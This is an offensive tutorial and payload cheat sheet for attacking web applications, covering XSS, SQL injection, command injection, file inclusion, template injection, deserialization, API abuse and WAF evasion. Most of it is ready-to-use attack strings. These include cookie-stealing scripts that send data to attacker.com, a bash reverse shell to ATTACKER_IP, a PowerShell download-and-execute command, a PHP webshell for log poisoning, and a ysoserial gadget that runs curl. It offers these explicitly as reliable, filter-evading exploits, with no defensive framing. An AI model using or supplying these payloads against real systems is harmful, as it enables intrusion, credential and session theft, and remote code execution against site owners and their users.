Crafting exploit payloads involves building precise inputs that manipulate a target application into performing unintended actions. These payloads take different forms depending on the vulnerability class, but the principle is the same: structure the input so it breaks the application’s expected logic, bypasses validation, and triggers malicious behavior.

Payload construction requires understanding:

• the execution context

• how the backend parses data

• how characters and encodings behave

• how filters and sanitizers work

• how to evade WAF, IDS, and backend validation

• how to chain multiple components into a final exploit

The goal is to generate payloads that work reliably across multiple requests and environments.

Understanding Payload Context

Before creating a payload, identify the context where the input lands:

• HTML → DOM → XSS payloads

• SQL query → SQL injection payloads

• command shell → command injection payloads

• file path → LFI/RFI payloads

• JSON/XML parser → injection or deserialization payloads

• backend logic → business logic exploitation payloads

Payloads must match their execution context.
A good payload is not universal; it’s context-specific.

Payload Foundation Structure

Every payload combines three parts:

1. Entry point
   How it reaches the vulnerable code.

2. Trigger
   The core malicious operation (e.g., <script>, ; ls, ' OR 1=1 --).

3. Stabilizer/Evasion
   Adjustments for encoding, filter bypass, WAF evasion, or escaping.

All practical exploitation follows this structure.

Payload Crafting for Major Vulnerability Types

Below are practical, fully actionable templates with real-world examples.

---

XSS Payload Crafting

XSS payloads must match their HTML context:

Context 1: HTML Body Injection

</div><script>fetch('https://attacker.com?c='+document.cookie)</script>

Context 2: Attribute Injection

" autofocus onfocus=fetch('https://attacker.com?c='+document.cookie) x="

Context 3: JavaScript String Injection

');fetch('https://attacker.com?c='+document.cookie);// 

Context 4: Event Attribute (rare filters bypass)

<svg onload=alert(document.domain)>

Practical Filter Bypass Tricks

• breaking out using "/>

• encoded payloads: %3Cscript%3Ealert(1)%3C/script%3E

• mixed-case tags: <ScRiPt>

• using SVG, MathML, or unknown tags

• injecting via JSON reflection

---

SQL Injection Payload Crafting

SQL payloads depend on query structure.
Identify:

• string-based queries

• numeric-based queries

• UNION queries

• stacked queries (if supported)

• time-based blind payloads

• boolean-based blind payloads

Practical SQLi Payloads

1. Breaking out of string context

' OR '1'='1

2. Numeric context bypass

1 OR 1=1

3. Extracting data (UNION)

' UNION SELECT 1,2,@@version --

4. Time-based blind

' AND SLEEP(5) --

5. Boolean blind

' AND 1=1 --
' AND 1=2 --

6. WAF bypass techniques

• inline comments: UN/**/ION

• mixed casing: UnIoN

• hex encoding: 0x414243

• multiline concatenation

---

Command Injection Payload Crafting

Command injection targets OS commands.

Basic payloads

; id
&& whoami
| uname -a

File write attempts

; echo 'pwned' > /tmp/p

Reverse shell payload (Linux)

; bash -c "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1"

Windows command payload

& powershell -NoP -Exec Bypass -C "IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER/p.ps1')"

Bypass techniques

• whitespace alternatives: ${IFS}

• using backticks: `id`

• encoding with URL, Base64

---

File Inclusion Payload Crafting

LFI Payload Examples

../../../../etc/passwd

PHP Wrappers

php://filter/convert.base64-encode/resource=index.php

Log poisoning for RCE

Step 1: Inject PHP via User-Agent

<?php system($_GET['cmd']); ?>

Step 2: Load log file via LFI

/var/log/apache2/access.log

RFI Payload

http://attacker.com/shell.txt

---

SSTI Payload Crafting

Server-Side Template Injection relies on template syntax.

Common Payloads

Jinja2

{{ 7*7 }}
{{ ''.__class__.__mro__[1].__subclasses__()[407]('id',shell=True,stdout=-1).communicate() }}

Twig

{{_self.env.registerUndefinedFilterCallback('exec')}}{{'id'|exec}}

Velocity

#foreach($i in [1..10])${i*7}#end

---

Deserialization Payload Crafting

Payloads depend on the language.

PHP Example

O:4:"Test":1:{s:4:"cmd";s:2:"id";}

Use a class with __wakeup() or __destruct() to execute commands.

Python Pickle Payload

cos
system
(S'id')
tR.

Java Gadget Payload (Commons Collections)

Generate via ysoserial:

java -jar ysoserial.jar CommonsCollections6 "curl attacker.com" > payload.ser

---

WebSocket Payload Crafting

Send crafted JSON frames:

{"action":"setRole","role":"admin"}

Brute-force frames:

{"action":"verifyOTP","code":"000001"}

---

Race Condition Payload Crafting

Focus on sending identical high-impact requests concurrently:

Example:

POST /transfer
amount=100

Then fire 200 parallel requests.

Use Turbo Intruder or Python threading:

for i in range(200):
    threading.Thread(target=hit).start()

---

API Exploit Payload Crafting

Mass Assignment

{"role":"admin","balance":10000}

BOLA / IDOR

/users/1002/orders

JSON injection

{"isAdmin":true}

---

WAF Evasion Techniques for Payloads

Attackers modify payloads to bypass filters:

• case variations: SeLeCt

• splitting operators: S||ELECT

• comment injection: UN/**/ION

• URL-encoded vectors: %2F%2E%2E%2F

• UTF-7/UTF-16 encoding

• using null bytes: %00

• multi-stage payloads

A strong exploit payload must survive filtering.

Payload Stabilization Strategy

Payloads must adjust to how the server processes data:

• use character encoding to evade filters

• adjust quotes based on context (single, double, backticks)

• escape characters only where needed

• detect if backend strips or transforms characters

• find where truncation occurs and craft short payloads

• match backend’s parsing quirks

Payload Chain Attacks

Exploit chains combine multiple payloads:

XSS → Cookie Steal → Session Hijack

LFI → Log Poisoning → RCE

SQLi → File Write → Webshell

CSRF + Open Redirect → Account Takeover

WebSocket Auth Bypass → Privilege Escalation

Each chain uses multiple crafted payloads.

Intel Dump

• Payloads depend on context: HTML, SQL, command shell, file paths, templates, JSON, or WebSockets.

• A complete payload includes an entry point, trigger, and evasion/stabilizer.

• XSS uses script and attribute injections.

• SQLi uses OR-based, UNION, blind, and WAF-bypass payloads.

• Command injection uses separators like ;, &&, and encoded payloads.

• File inclusion payloads use traversal, wrappers, and log poisoning.

• SSTI uses template syntax to escalate into RCE.

• Deserialization payloads depend on language gadgets and unsafe magic methods.

• API payloads exploit mass assignment and IDOR/role tampering.

• WAF evasion includes encoding, mixed case, comments, and operator splitting.

• Strong payloads adapt to backend parsing quirks and stabilize for reliable exploitation.